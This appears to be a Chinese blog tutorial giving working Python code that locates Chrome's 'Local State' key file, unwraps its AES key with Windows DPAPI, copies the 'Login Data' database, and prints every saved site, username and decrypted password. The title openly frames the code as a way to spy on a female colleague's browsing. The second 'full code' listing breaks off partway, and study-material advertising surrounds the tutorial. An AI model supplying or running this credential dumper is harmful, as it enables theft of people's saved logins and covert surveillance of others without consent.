admin管理员组文章数量:1667457
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化学习资料的朋友,可以戳这里获取
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
在直接进入提取 chrome密码之前,我们需要定义一些有用的函数来帮助我们在主函数中。
def get_chrome_datetime(chromedate):
“”"从chrome格式的datetime返回一个datetime.datetime
对象
因为’chromedate’的格式是1601年1月以来的微秒数"“”
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ[“USERPROFILE”],“AppData”, “Local”, “Google”, “Chrome”,“User Data”, “Local State”)
with open(local_state_path, “r”, encoding=“utf-8”) as f:
local_state = f.read()
local_state = json.loads(local_state)
从Base64解码加密密钥
key = base64.b64decode(local_state[“os_crypt”][“encrypted_key”])
删除 DPAPI str
key = key[5:]
返回最初加密的解密密钥
使用从当前用户的登录凭据派生的会话密钥
官方文档doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
获取初始化向量
iv = password[3:15]
password = password[15:]
生成密码
cipher = AES.new(key, AES.MODE_GCM, iv)
解密密码
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
not supported
return “”
get_chrome_datetime()函数负责将 chrome 日期格式转换为人类可读的日期时间格式。 get_encryption_key()函数提取并解码用于加密密码的AES密钥,这"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State"作为 JSON 文件存储在路径中
decrypt_password()
将加密密码和 AES 密钥作为参数,并返回密码的解密版本。
下面是main主要功能:
def main():
获取AES密钥
key = get_encryption_key()
本地sqlite Chrome数据库路径
db_path = os.path.join(os.environ[“USERPROFILE”], “AppData”, “Local”,“Google”, “Chrome”, “User Data”, “default”, “Login Data”)
将文件复制到其他位置
因为如果chrome当前正在运行,数据库将被锁定
filename = “ChromeData.db”
shutil.copyfile(db_path, filename)
连接数据库
db = sqlite3.connect(filename)
cursor = db.cursor()
登录表中有我们需要的数据
cursor.execute(“select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created”)
iterate over all rows
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
date_created = row[4]
date_last_used = row[5]
if username or password:
print(f"Origin URL: {origin_url}")
print(f"Action URL: {action_url}")
print(f"Username: {username}")
print(f"Password: {password}")
else:
continue
if date_created != 86400000000 and date_created:
print(f"Creation date: {str(get_chrome_datetime(date_created))}")
if date_last_used != 86400000000 and date_last_used:
print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
print(“=”*50)
cursor.close()
db.close()
try:
尝试删除复制的db文件
os.remove(filename)
except:
pass
首先,我们使用之前定义的get_encryption_key()函数获取加密密钥,然后我们将 sqlite 数据库(位于"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default\Login Data
"保存密码的位置)复制到当前目录并连接到它,这是因为原始数据库文件将被锁定Chrome 当前正在运行。
之后,我们对登录表进行选择查询并遍历所有登录行,我们还解密每个密码date_created
并将date_last_used
日期时间重新格式化为更易于阅读的格式。
最后,我们打印凭据并从当前目录中删除数据库副本。
让我们调用主函数,完美提取Chrome浏览器保存的密码:
完整代码
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime, timedelta
def get_chrome_datetime(chromedate):
“”"从chrome格式的datetime返回一个datetime.datetime
对象
因为’chromedate’的格式是1601年1月以来的微秒数"“”
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ[“USERPROFILE”],
“AppData”, “Local”, “Google”, “Chrome”,
“User Data”, “Local State”)
with open(local_state_path, “r”, encoding=“utf-8”) as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state[“os_crypt”][“encrypted_key”])
key = key[5:]
最后
不知道你们用的什么环境,我一般都是用的Python3.6环境和pycharm解释器,没有软件,或者没有资料,没人解答问题,都可以免费领取(包括今天的代码),过几天我还会做个视频教程出来,有需要也可以领取~
给大家准备的学习资料包括但不限于:
Python 环境、pycharm编辑器/永久激活/翻译插件
python 零基础视频教程
Python 界面开发实战教程
Python 爬虫实战教程
Python 数据分析实战教程
python 游戏开发实战教程
Python 电子书100本
Python 学习路线规划
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化学习资料的朋友,可以戳这里获取
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
版权声明:本文标题:同事女神小姐姐经常用网页浏览那种东西。用Python提取Chrome浏览器保存的密码!就自然找到是哪个网站了!(1) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1730102109a1222812.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论